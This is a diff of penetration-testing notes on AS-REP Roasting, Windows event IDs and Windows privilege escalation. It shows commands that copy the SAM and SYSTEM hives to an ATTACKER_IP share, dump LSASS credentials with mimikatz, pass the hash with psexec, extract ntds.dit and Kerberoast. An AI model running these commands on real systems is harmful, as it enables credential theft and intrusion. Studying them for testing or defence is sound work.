more info

Enumeration/AS-REP Roasting.md

@@ -1,4 +1,10 @@
-# AS-Rep Roating
+# AS-Rep Roasting
+
+AS-REP Roasting targets account for which preauthentication is disabled.
+This means `DONT_REQUIRE_PREAUTH` for an account is enabled, and the DC skips
+the verification step. After event type `4768` the `Pre_Authentication_Type=0`
+and event code `4769` and `4624` is never triggered.
+A service can be requested without any password check.
 
 AS-Rep Roasting dumps user accounts which did not enable pre-authentication.
 This is somewhat similar to Kerberoasting but includes user accounts as well.

Forensics/Windows Event Logs.md

@@ -27,6 +27,7 @@ Get-WinEvent -FilterHashTable @{LogName='<Category>';ID='<Event IDs>'} | fl
 
 * **1**: Process Creation (Applications & Services -> Microsoft -> Windows ->
   Sysmon -> Operational)
+* **10**: ProcessAccess, Sysmon event where one process  opens a handle to another process
 * **4688**: Process Creation (Windows Logs -> Security)
 
 ### Files

Post Exploitation/Windows/Windows PrivEsc.md

@@ -145,7 +145,7 @@ sc start TheService
 
 ### Startup Application
 
-* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`  
+* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`
 
 ### Password Mining
 
@@ -184,7 +184,7 @@ C:\inetpub\wwwroot\web.config
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
 ```
 
-### Putty 
+### Putty
 
 * Saved proxy password credentials may be found via
 ```sh
@@ -294,7 +294,7 @@ secretsdump.py -sam sam.hive -system system.hive LOCAL
 hashdump
 ```
 
-* Use pass the hash to login 
+* Use pass the hash to login
 ```sh
 psexec.py -hashes <hash> administrator@$TARGET_IP
 ```
@@ -314,7 +314,7 @@ copy cmd.exe utilman.exe
 * It is a rouge potato
 * Execute process as another user
 * Service accounts operate through impersonation
-* Check privileges via `whoami /priv` for these 
+* Check privileges via `whoami /priv` for these
 * __Object Exporter Identifier (OXID)__ is executed as via DCOM as a resolver on port 135 to socket of attacker
 ```sh
 socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
@@ -324,12 +324,14 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
 
 ### Volume Shadow Copy Service
 
-* Take a look at the volumes at
+Take a look at the volumes at
+
 ```sh
 vssadmin list shadows
 ```
 
-* Copy `sam` and `system` from the shadow copy
+Copy `sam` and `system` from the shadow copy
+
 ```sh
 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
@@ -337,10 +339,14 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sys
 
 ### Dump LSASS
 
-* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile`
+LSASS contains multiple different credential types like NTLM password hashes,
+active krb session tickets, plaintext passwords and cached domain credentials.
+
+* If administrator permissions are gained, a dump file can be created by opening the task manager and right-clicking `lsass.exe` -> `creat dumpfile`
 * Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe`
 
 * Extract the dump via mimikatz
+
 ```sh
 privilege::debug
 sekurlsa::logonpasswords
@@ -387,7 +393,7 @@ sekurlsa::credman
 ### Ntdsutil
 
 * If administrative permissions on the DC have been gained this can be done
-* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM) 
+* Used to maintain the AD database, delete objects, snapshotting, set Directory Service Restore Mode (DSRM)
 
 
 #### Locally extracting ntds.dit
@@ -411,7 +417,7 @@ secretsdump.py -security ./SECURITY -system ./SYSTEM -ntds ./ntds.dit local
 
 #### Remotely dumping ntds
 
-* Needs the following AD credentials 
+* Needs the following AD credentials
     * Replicating Directory Changes
     * Replicating Directory Changes All
     * Replicating Directory Changes in Filtered Set
@@ -469,7 +475,7 @@ net user <GroupMemberUsername>
 GetUserSPNs.py -dc-ip $DC_IP <domain>/<user>
 ```
 
-* Take a look at `Name` in the output and use it to query a TGS ticket 
+* Take a look at `Name` in the output and use it to query a TGS ticket
 ```sh
 GetUserSPNs.py -dc-ip $DC_IP <domain>/<user> -request-user <SPN>
 ```